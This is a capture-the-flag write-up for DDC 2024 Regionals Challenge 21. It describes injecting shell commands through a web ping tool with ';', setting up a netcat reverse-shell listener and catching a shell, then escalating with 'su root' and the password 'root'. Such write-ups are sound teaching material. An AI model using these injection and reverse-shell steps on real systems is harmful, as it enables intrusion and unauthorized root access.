One minute
DDC 2024 Regionals - Challenge 21
We are given the following url: http://toolbox.hkn
Visiting the site we see that it is a toolbox of network diagnostic tools.
If we look at the ping
tool we can see that we are able to run other bash commands by separating them with a ;
:
We sadly cant just read the flag:
We can see that this is because it is owned by root
and only root
has read permissions:
So lets upload a revshell so then try and privesc from there.
We create a revshell using https://revshells.com, setup a listener (nc -lvnp 9001
) and then execute on the target (I saved the revshell to a local file and then served that file with python -m http.server
):
And we get a shell:
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [25.145.240.254] from (UNKNOWN) [25.145.240.1] 56300
flask@9013395f3c04:/www$ ls
ls
app flag.txt instance run.py
And privesc from here is deceptively easy, running linpeas.sh doesn’t really give any useful privesc methods, but you can actually just switch to root
using the password root
:
flask@9013395f3c04:/www$ su root
su root
Password: root
root@9013395f3c04:/www# cat flag.txt
cat flag.txt
DDC{B2iZ71MHnxTV0oaMDWZDsm2Qr}